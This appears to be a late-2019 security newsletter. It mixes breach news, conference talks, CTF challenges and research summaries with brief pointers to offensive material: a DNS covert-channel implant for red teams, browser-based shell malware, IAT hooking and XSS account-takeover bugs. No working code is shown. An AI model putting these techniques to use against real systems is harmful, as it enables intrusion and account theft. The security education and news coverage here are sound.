Word of the week
“The Holiday Phish”: 39% of Employees Gave Away Their Passwords to This Simulated Phishing Email
Word of the week special
“Crypto Can Be Cracked … Through Walls”
Watch out for those side channels.
The cracking of encryption keys has often involved brute force methods or targeting flaws in its implementation. There is, though, increasing interest in physical side-channel attacks where there is an unintentional information leakage of cryptography information, such as from electromagnetic radiation, power consumption, electric voltage fluctuations, and even sound and thermal variations. Few companies currently protect their devices against side-channel attacks, especially as it would prove costly, and require extensive testing with complex equipment.
Devices too are becoming faster, and, as they do, they are likely to emit an increasing amount of radio and electromagnetic (EM) emissions. A 2GHz processor, for example, is running at the same frequency as our wi-fi signals (2.4 GHz), and often the chips are not protected from emitting radio waves, and that is it a natural by-product of the fast operation of the device. As these high frequencies it is often difficult to stop EM emissions and from these being coupled into nearby wires and into other circuits
“Digital Footprints and Shadows”
Like it or not, everything we do in the virtual world we loosely call “The Internet” leaves a trace and no matter how hard we try, we cannot truly remove all evidence of our actions. Definitions vary, but a footprint (or Digital Footprint) is essentially the trace we leave as a result of our direct actions – browsing websites, downloading apps, streaming videos, subscribing to content, and using cloud email services such as Gmail
Connection to the CLOUD
Really simple, done! – thanks to Jinshu
Not sure what to study for in 2020? Here you go!
Link HERE – thanks to Naz
State of the art security for a pentest labs website
Link HERE – thanks to Prash
Crypto challenge of the week
CTF Challenges – try the challenges!
Link HERE – thanks to Venkat
GitHub Security Lab CTF 3: XSS-unsafe jQuery plugins
Do you want to challenge your vulnerability hunting skills and to quickly learn Semmle CodeQL?
Your mission, should you choose to accept it, is to find variants of jQuery plugins that expose their clients to undocumented XSS (cross-site scripting) vulnerabilities. You will do this by utilizing CodeQL, our simple, yet expressive, code query language. To capture the flag, you’ll need to write a query that finds the unsafely implemented jQuery plugins in Bootstrap, using this step by step guide
HackingLab Christmas Advent Challenge
I got this little image, but it looks like the best part got censored on the way. Even the tiny preview icon looks clearer than this! Maybe they missed something that would let you restore the original content?
EU countries fail to agree on privacy rules governing WhatsApp, Skype
“It looks like amateur satellite trackers found the secret satellite that Trump tweeted the picture from. It’s evidently an NRO HK-11 model, with what’s essentially a Hubble Telescope pointed towards the Earth”
Book of the month
The Secure Development Handbook
Peerlyst Community eBook: 32 Influential Malware Research Professionals
Comic of the week
##Some OWASP stuff first
-Android App Reverse Engineering 101
-When clean code intended to help security can do the opposite
-Research shows reliance on open source components can be risky
-How does Static Code Analysis work – the Fortify flavour
-A Microsoft DevSecOps Static Application Security Testing (SAST) Exercise
Static Application Security Testing (SAST) is a critical DevSecOps practice. As engineering organizations accelerate continuous delivery to impressive levels, it’s important to ensure that continuous security validation keeps up. To do so most effectively requires a multi-dimensional application of static analysis tools. The more customizable the tool, the better you can shape it to your actual security risk
-An Introduction to Buffer Overflow Vulnerability
The art of memory exploitation
OWASP events HERE
All InfoSec events HERE
The complete Security Events calendar – Peerlyst
AWS re:Invent presentations
AWS re:Invent 2019 – Keynote with Dr. Werner Vogels
AWS re:Invent 2019: Why you need a ledger database: BMW, DVLA, & Sage discuss use cases
AWS re:Invent 2019: Top 5 container and Kubernetes best practices
AWS re:Invent 2019: Remote desktop and application streaming with NICE DCV
AWS re:Invent 2019: Application configuration as code
AWS re:Invent 2019: Strong security made simple: Putting all the pieces together
AWS re:Invent 2019: [REPEAT 1] Vulnerability disclosure and response with AWS security
AWS re:Invent 2019: It’s always day zero: Working on open source and security
AWS re:Invent 2019: Prepare for & respond to security incidents in your AWS environment
AWS re:Invent 2019: [REPEAT] Detect network and security anomalies with Traffic Mirroring
AWS re:Invent 2019: Leadership session: AWS security
AWS re:Invent 2019: Life hacks for automating DevSecOps security tasks
AWS re:Invent 2019: [REPEAT] Master your security in the cloud
AWS re:Invent 2019: Protecting you from you: Misconfiguration-caused breaches
AWS re:Invent 2019: Speculation & leakage: Timing side channels & multi-tenant computing
DevSecCon London 2019 Day 2 Siren Hofvander – Progress, Not Just Motion Security, the Hero’s Journey
All presentations are HERE
Blackhat London 2019
Keynote: Blue to Red: Traversing the Spectrum by Amanda Rousseau
Link HERE More next week
Global ALERT level
BLUE or GUARDED indicates a general risk of increased hacking, virus, or other malicious activity. The potential exists for malicious cyber activities, but no known exploits have been identified, or known exploits have been identified but no significant impact has occurred.
Incident data HERE Find your country
NCSC Weekly Threat Report
Consumers prepare for Black Friday & Cyber Monday
The Black Friday and Cyber Monday sales are now upon us with consumers set to be tempted with bargains this weekend and beyond.
T-Mobile breach affects more than a million customers
API Security Issue 60 – Microsoft Azure OAuth2 Vulnerability, 5G Threat Landscape, Webinars
Incidents & events detail
The StrandHogg vulnerability
Cyber criminal charged with stealing £76m while working for Russian intelligence
Hackers calling themselves ‘Evil Corp’ have been sanctioned by the US Treasury as a criminal indictment against them is unsealed
Evil Corp. Hacking Group Indictments
US federal prosecutors have indicted Maksim Yakubets and Igor Turashev, who are allegedly members of the hacking group known as Evil Corp. The pair allegedly “led one of the most sophisticated transnational cybercrime syndicates in the world,” according to a US Department of Justice press release
Man-in-the-Middle Attack Used to Steal Venture Capital Investment
Hackers used a complex man-in-the-middle attack to steal approximately US $1 million from a Chinese venture capital firm that was supposed to be going to a start-up company in Israel. The hackers set up phony domains and spoofed emails between the companies, even going so far as to cancel a scheduled in-person meeting.
Atlassian scrambles to fix zero-day security hole accidentally disclosed on Twitter
Exposed private cert key may also be an issue for IBM Aspera.
Twitter security celeb SwiftOnSecurity on Tuesday inadvertently disclosed a zero-day vulnerability affecting enterprise software biz Atlassian, a flaw that may be echoed in IBM’s Aspera software.
New Linux Vulnerability Lets Attackers Hijack VPN Connections
Security researchers found a new vulnerability allowing potential attackers to hijack VPN connections on affected *NIX devices and inject arbitrary data payloads into IPv4 and IPv6 TCP streams.
The Evolution of Russia’s Dark Web
Smart refrigerator hack exposes Gmail login credentials
A bonus feature on a smart home product becomes a security liability
French officials say they are still considering a response to a cyber attack on a public hospital, including a possible “hack back.”
A popular website among hackers that sold spying tools was taken down after an international investigation
The British government says the site sold these tools to more than 14,500 people
Popular spyware company Hacking Team is making a comeback under new ownership
With the aim of ensuring their tools aren’t being abused
Great Cannon DDoS Tool Reportedly Being Used on Hong Kong Protesters’ Online Forum
A distributed denial-of-service (DDoS) tool known as the Great Cannon has reportedly been used against the LIHKG social media platform used by protesters in Hong Kong. China’s Great Cannon was first described by Citizen Lab in April 2015
Netflix ‘reactivated’ users without permission
BlackDirect: Microsoft Azure Account Takeover
Over the last few weeks, my team and I have been working on research associated with Microsoft Azure and Microsoft OAuth 2.0. Over the course of that time, we found a vulnerability that allows for the takeover of Microsoft Azure Accounts. Affecting specific Microsoft’s OAuth 2.0 applications, this particular vulnerability allows the creation of tokens with the victim’s permissions. This could let a malicious attacker access and control a victim’s account and take actions on their behalf
Custom Malware Development (Establishing A Shell Through the Target’s Browser) – Repurposing @beefproject & AutoIt
Research of the week
Featuring – Outrageous predictions
Looking into the future is something of a fool’s game, but it remains a useful exercise — helping prepare for what lies ahead by considering the full possible range of economic and political outcomes. This is where Saxo’s annual Outrageous Predictions fit in: not as a forecast for what 2020 will bring, but as an exercise in considering the full extent of what is possible, even if not necessarily probable. Inevitably the outcomes that prove the most disruptive (and therefore outrageous) are those that are a surprise to consensus
Link HERE – thanks to Naz
Formal Reasoning About the Security of Amazon Web Services
We report on the development and use of formal verification tools within Amazon Web Services (AWS) to increase the security assurance of its cloud infrastructure and to help customers secure themselves. We also discuss some remaining challenges that could inspire future research in the community
Link HERE – thanks to Alvin
Runtime Application Self-Protection (RASP), Investigation of the Effectiveness of a RASP Solution in Protecting Known Vulnerable Target Applications
Year after year, attackers target application-level vulnerabilities. To address these vulnerabilities, application security teams have increasingly focused on shifting left – identifying and fixing vulnerabilities earlier in the software development life cycle. However, at the same time, development and operations teams have been accelerating the pace of software release, moving towards continuous delivery. As software is released more frequently, gaps remain in test coverage leading to the introduction of vulnerabilities in production. To prevent these vulnerabilities from being exploited, it is necessary that applications become self-defending. RASP is a means to quickly make both new and legacy applications self-defending. However, because most applications are custom-coded and therefore unique, RASP is not one-size-fits-all – it must be trialled to ensure that it meets performance and attack protection goals. In addition, RASP integrates with critical applications, whose stakeholders typically span the entire organization. To convince these varied stakeholders, it is necessary to both prove the benefits and show that RASP does not adversely affect application performance or stability. This paper helps organizations that may be evaluating a RASP solution by outlining activities that measure the effectiveness and performance of a RASP solution against a given application portfolio
CertiKOS: A breakthrough toward hacker-resistant operating systems
A team of Yale researchers has unveiled CertiKOS, the world’s first operating system that runs on multi-core processors and shields against cyber attacks, a milestone that the scientists say could lead to a new generation of reliable and secure systems software.
Led by Zhong Shao, professor of computer science at Yale, the researchers developed an operating system that incorporates formal verification to ensure that a program performs precisely as its designers intended — a safeguard that could prevent the hacking of anything from home appliances and Internet of Things (IoT) devices to self-driving cars and digital currency
The Frugal Hacker: Hacking on a Shoestring Budget
“Being frugal pretty much comes with the territory as hackers”
Import Address Table (IAT) Hooking
Windows portable executable contains a structure called Import Address Table (IAT)
IAT contains pointers to information that is critical for an executable to do its job:
It is possible to hook function pointers specified in the IAT by overwriting the target function’s address with a rogue function address and optionally to execute the originally intended function
Tool of the week
AWS Fraud Detector
Amazon Fraud Detector is a fully managed service that makes it easy to identify potentially fraudulent online activities such as online payment fraud and the creation of fake accounts. Fraud Detector uses machine learning (ML) and 20 years of fraud detection expertise from AWS and Amazon.com to automatically identify potentially fraudulent activity so you can catch more fraud faster
Amazon Detective is a new service in Preview that makes it easy to analyze, investigate, and quickly identify the root cause of potential security issues or suspicious activities. Amazon Detective automatically collects log data from your AWS resources and uses machine learning, statistical analysis, and graph theory to build a linked set of data that enables you to easily conduct faster and more efficient security investigations.
Amazon CodeGuru is a new machine learning service for development teams who want to automate code reviews, identify the most expensive lines of code in their applications, and receive intelligent recommendations on how to fix or improve their code
DNS covert channel implant for Red Teams
WEASEL is a small in-memory implant using Python 3 with no dependencies. The beacon client sends a small amount of identifying information about its host to a DNS zone you control. WEASEL server can task clients to execute pre-baked or arbitrary commands.
Other interesting articles
##Misconceptions: Unrestricted Release of Offensive Security Tools
Uncontrolled distribution of Offensive Security Tools is an unnecessary contribution to real threat actor’s criminal and intelligence network operations
##World Quality Report: Shift your focus to QA for an app sec win
The fight to educate developers is far from over, but the majority of application security specialists believe that their companies and developers now have the policy chops and awareness to secure their software. Unfortunately, most development teams’ security tools and controls are failing to meet the need.
##Why We Need to Care About AI Sensitivity
Technology reflects, not erases, our biases.
It’s a truth that always bears repeating: computers only know what we program them to know. This basic fact has enabled the false idea that the value-neutral language of code erases the all-too-human qualities of prejudice from the equation. After all, we think of humans as fallible thinkers, prone to unfair judgments and biased decision-making. Machines should, in theory, be better — shouldn’t they?
##The Unbelievable Demand for Cybersecurity Workers
By 2021, there will be roughly 3.5 million unfilled cybersecurity jobs across the globe
“If someone has six months to a year of work and when they came in for an interview, they didn’t pee on the rug, they’re going to make in the neighborhood of $85,000.”
##And finally, THE FUTURE
No time was wasted. What was destined to be computed has been computed. The future is deterministic in the eye of itself. As a wise antique dealer would tell you, your life might as well have taken the most optimised path in a non-deterministic Turing machine of all life possibilities. What of is the path most optimised in terms? That is the gate to all mystery. Those who seek mystery are forever lost, and so are those who seek the future.
Perchance I am now back on track again to attempt another intersection with something great. With my dear sister this time. All the right pieces are gradually falling into place as they rapidly hot-swap in unfathomable ways. We are as confident we are going to inspire people and positively impact the world as we are skeptical if any of this makes sense. When the fascination for what shall arise has attached itself firmly to the precautionary tales of what shan’t, the prophecies collapse and the Tao remains undefined and truthful to its ontological amusement.
##HACKING, TOOLS and FUN – CHECK BELOW!
Description: XSS in GMail’s AMP4Email via DOM Clobbering.
Description: Reflected XSS in graph.facebook.com leads to account takeover in IE/Edge.